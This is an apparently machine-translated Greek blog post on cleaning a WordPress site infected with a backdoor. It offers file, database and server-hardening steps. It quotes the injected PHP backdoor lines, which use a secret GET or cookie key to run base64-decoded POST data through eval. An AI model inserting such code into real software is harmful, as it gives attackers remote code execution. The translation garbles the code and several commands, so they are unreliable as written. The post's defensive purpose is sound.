Εκμεταλλευτείτε WordPress - καθαρισμού μολυσμένων αρχείων, ασφάλεια και SQL Server.

Πριν διαβάσετε αυτό το μήνυμα, θα πρέπει να δείτε , Για να καταλάβετε κάτι. :)

Βρήκαμε σε πολλά από τα blogs στο stealthsettings.com αρχείων, παρόμοιο με τον κώδικα παρακάτω virusarii προκύπτουν από την WordPress εκμεταλλεύονται.:

<? Php if ($ _ GET [ '573abcb060974771'] == "8e96d1b4b674e1d2") {eval (base64_decode ($ _ POST [ 'αρχείο']))? έξοδο? }?>

si

<?php if($_COOKIE[XCHARX44e827f9fbeca184XCHARX]==XCHARX5cd3c94b4b1c57eaXCHARX){ eval(base64_decode($_POST[XCHARXfileXCHARX])); exit; } ?>

xmlrpcΑν είναι πάνω από το αρχείο xmlrpc.php από νυσταγμένοςΑλλά σε μια grep διακομιστή, μπορείτε να δείτε ότι υπάρχουν πολύ λίγα του είδους του στον πηγαίο κώδικα.

pppffiuuu

Καθαρισμός μολυσμένων αρχείων:

Ooookkkk ...
1. Η καλύτερη λύση, αφού είχε στο CloudΚαι καθαριστεί η βάση δεδομένων είναι σε διαγράψετε αρχεία WordPress (Μπορείτε να κρατήσετε το wp-config.php και αρχεία που δεν αφορούν αυστηρά πλατφόρμα wp, αφού ελεγχθεί προσεκτικά) στο διακομιστή και να ανεβάσετε την αρχική έκδοση 2.5.1 (Κατά τη διάρκεια αυτής WP κάνει μια έκδοση αναβάθμισης :)) http://wordpress.org/download/ . Σκουπίστε συμπεριλαμβανομένων των αρχείων θέμα αν δεν εμπιστεύεστε ότι προσεκτικό έλεγχο τους.

Φαίνεται να έχουν επηρεαστεί και τα αρχεία από τα θέματα που δεν έχουν χρησιμοποιηθεί πριν για το blog και απλά αλλάζοντας το θέμα, δεν λύνει το πρόβλημα.

./andreea/wp-content/themes/default/index.php:<?php αν ($ _ COOKIE [«44e827f9fbeca184 '] ==' 5cd3c94b4b1c57ea") {eval (base64_decode ($ _ POST ['αρχείο']))? έξοδο? ;}> <? Php get_header ()? ?>

2. Αναζήτηση και να διαγράψετε όλα τα αρχεία που περιέχουν: * _new.php, _old.php *, * Jpgg, Giff *, * Pngg και το αρχείο wp-info.txt, αν υπάρχουν....

Εύρεση. -Όνομα "* _new.php"
Εύρεση. -Όνομα "* _old.php"
Εύρεση. -Όνομα "*. Jpgg"
Εύρεση. -Όνομα "* _giff"
Εύρεση. -Όνομα "* _pngg"
Εύρεση. -Όνομα "wp-info.txt"

3. σε / Tmp , Αναζήτηση και να διαγράψετε φακέλους, όπως tmpYwbzT2

SQL Καθαρισμός :

1. στον πίνακα Πίνακα wp_options δείτε αν υπάρχει διαγράψετε τις γραμμές: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Επίσης, σε wp_options, πηγαίνετε στο active_plugins διαγράψετε και αν υπάρχει ένα plugin που καταλήγει σε μια από τις επεκτάσεις * _new.php, _old.php *, *. jpgg, *. GIFF, *. pngg ή αν κάποια άλλη επέκταση είναι ύποπτο, ελέγξτε προσεκτικά.

3. Στον Πίνακα wp_users, Δείτε αν υπάρχει ένας χρήστης που δεν έχει γράψει τίποτα στο δικαίωμά του, η στήλη user_nicename. Διαγραφή αυτόν τον χρήστη, αλλά σημειώστε τον αριθμό που αναγράφεται στη στήλη ID. Αυτός ο χρήστης μπορεί να χρησιμοποιήσει "WordPress" ως user_login και φαίνεται να δημιουργείται στην 00: 00: 00 0000-00-00.

4. Πηγαίνετε στον πίνακα wp_usermeta και να διαγράψετε όλες τις γραμμές που ανήκουν ID παραπάνω.

Αφού έχετε κάνει αυτό το sql καθαρισμό, απενεργοποιήστε και στη συνέχεια να ενεργοποιήσετε κάποια plugin. (Στο blog -> Πίνακας -> Plugins)

Secure Server:

1. Δείτε ποιες είναι οι κατάλογοι και τα αρχεία "εγγράψιμο"(Chmod 777) και προσπαθήστε να βάλετε σε αυτά ένα chmod που δεν θα επιτρέψει εγγράφως τους σε οποιοδήποτε επίπεδο. (644 chmod, για παράδειγμα)

Εύρεση. -Perm-2-ls

2. Δείτε ποια αρχεία έχουν το σύνολο bit suid ή sgid . Εάν δεν χρησιμοποιήσετε αυτά τα αρχεία που τους chmod 0 ή να απεγκαταστήσετε το πακέτο που περιέχει. Είναι πολύ επικίνδυνο, επειδή εκτελούν προνόμια "ομάδα"Sau"ρίζα"Και δεν με κανονική προνόμια χρήστη να εκτελέσει αυτό το αρχείο.

find /-type f-perm-04000-ls
find /-type f-perm-02000-ls

3. Δείτε ποιες θύρες είναι ανοικτές και να προσπαθήσει να κλείσει ή να εξασφαλίσει αυτά που δεν χρησιμοποιούνται.

netstat-an | grep-i ακούστε

Σχετικά με αυτό. Βλέπω Google Search και άλλοι λένε "Καλά έκανες!». Καλά καλά έχετε κάνει ... αλλά τι γίνεται αν google αρχίζει να απαγορεύσει όλες οι περιοχές σχηματίζοντας ΕΙΝΑΙ SPAM και να θέσει Trojans (Trojan.Clicker.HTML) Σε μπισκότα;

Εκμεταλλευτείτε WordPress - καθαρισμού μολυσμένων αρχείων, ασφάλεια και SQL Server.

Σχετικά με τον Συγγραφέα

Λαθραία

Πάθος για ό, τι το gadget και να το γράψετε με χαρά stealthsettings.com των 2006 και μου αρέσει να ανακαλύψει νέα πράγματα μαζί σας σχετικά με τους υπολογιστές και το MacOS, Linux, Windows, iOS και Android.

1 Σχόλια

Αφήστε ένα σχόλιο

Αυτός ο ιστότοπος χρησιμοποιεί το Akismet για να μειώσει το spam. Μάθετε πώς επεξεργάζονται τα δεδομένα των σχολίων σας.